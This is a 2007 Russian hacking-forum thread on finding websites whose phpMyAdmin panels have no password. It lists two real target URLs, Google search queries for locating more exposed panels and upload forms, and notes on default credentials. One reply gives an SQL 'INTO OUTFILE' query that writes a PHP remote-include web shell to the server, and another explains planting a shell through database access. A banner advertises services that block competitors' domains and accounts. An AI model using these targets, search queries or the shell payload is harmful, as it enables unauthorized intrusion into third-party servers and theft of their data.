Сайты с открытыми админками

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Сайты с открытыми админками

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

Сайты с открытыми админками

09.05.2007, 14:28

mr.The

Познавший АНТИЧАТ

Регистрация: 30.04.2007

Сообщений: 1,205

С нами: 10016425

Репутация: 1257

Сайты с открытыми админками

Ненашел похожей темы и решл создать. есть сайты админы которых полные ламеры и незащищают админки паролями. Предлагаю в этой теме давать ссылки на на сайты этих типов.

Цитата:

http://85.114.241.23/phpmyadmin/server_status.php?lang=ru-win1251&server=1

Цитата:

http://mazdie.tushino.com/phpMyAdmin/main.php?lang=ru-win1251&server=1

𝕏 Twitter Reddit Telegram Копировать ссылку

09.05.2007, 14:38

Ksander

Постоянный

Регистрация: 21.06.2006

Сообщений: 931

С нами: 10467686

Репутация: 930

inurl:/phpMyAdmin/main.php

Вот тебе и список.

09.05.2007, 14:50

mr.The

Познавший АНТИЧАТ

Регистрация: 30.04.2007

Сообщений: 1,205

С нами: 10016425

Репутация: 1257

Цитата:

inurl:/phpMyAdmin/main.php

Вот тебе и список.

невсегда так.
иногда нужны более извращённые методы

09.05.2007, 16:37

Zitt

Познавший АНТИЧАТ

Регистрация: 07.05.2006

Сообщений: 1,031

С нами: 10533245

Репутация: 773

inurl:main.php Welcome to phpMyAdmin

09.05.2007, 17:39

fly

Постоянный

Регистрация: 15.04.2007

Сообщений: 645

С нами: 10038327

Репутация: 251

Можно попробовать поискать /Ftp и /uploads , например, бывает что есть обычная html страничка с формой для отправки файла на сервер. Способ 2 нахождения админки( 5-8%)
По дефолту стоит пароль и логин admin и т.п. Ну и оськомерц там вроде админка иногда без пасса или .htpasswd. Запрос для upload filetype:html inurl:uploads site:com!

14.05.2007, 09:03

BromTyZ

Новичок

Регистрация: 18.03.2007

Сообщений: 7

С нами: 10078481

Репутация: 8

http://forum.antichat.ru/thread40031.html
Заходим суда, тут сканер таких дир!

14.05.2007, 20:00

PahaN33

Новичок

Регистрация: 05.04.2007

Сообщений: 11

С нами: 10052488

Репутация: 0

обьясните новичку, как через пхпмуадмин, заливать файлы, на сервер...

((( оч прошу помогите

Последний раз редактировалось _Pantera_; 14.05.2007 в 22:54..

15.05.2007, 00:24

fly

Постоянный

Регистрация: 15.04.2007

Сообщений: 645

С нами: 10038327

Репутация: 251

Вообще долго рассказывать, но например есть у тебя доступ в phpmyadmin(если есть базы). Изучаешь структуру баз(залей дамп всей или части базы на хард), затем можно просто либо проинклудить определенный параметр в таблицы определенной базы (смотри тему phpbb) либо создать файл(твой шелл), также если данная база, которую ты решил изучить имеет характер Скрипт-Галерея или какой-либо upload файлов различных расширений , что мешает добавить тот же *.php формат, дело вкуса! Удачи!

15.05.2007, 00:40

p-range

Участник форума

Регистрация: 05.02.2006

Сообщений: 168

С нами: 10663526

Репутация: 715

Цитата:

обьясните новичку, как через пхпмуадмин, заливать файлы, на сервер... ((( оч прошу помогите

если есть права, выполняй запрос:

Код:

select '<?include($_GET[bravo])?>' from table into outfile '/patch/to/file.php';

#10

17.05.2007, 21:45

PahaN33

Новичок

Регистрация: 05.04.2007

Сообщений: 11

С нами: 10052488

Репутация: 0

2 p-range

блин запрос выполняеться, но пишет что неможет создать файл.

Страница 1 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Сайты зомби	Micr0b	Уязвимости	25	20.07.2007 18:36
Сайты российских компаний признаны худшими в Европе	-Concord-	Мировые новости. Обсуждения.	10	29.11.2006 04:56
Опасные сайты	Dracula4ever	Мировые новости. Обсуждения.	2	28.05.2006 16:11
В 2005 году число dDoS-атак на web сайты возросло на 679%	dinar_007	Мировые новости. Обсуждения.	0	02.03.2006 19:47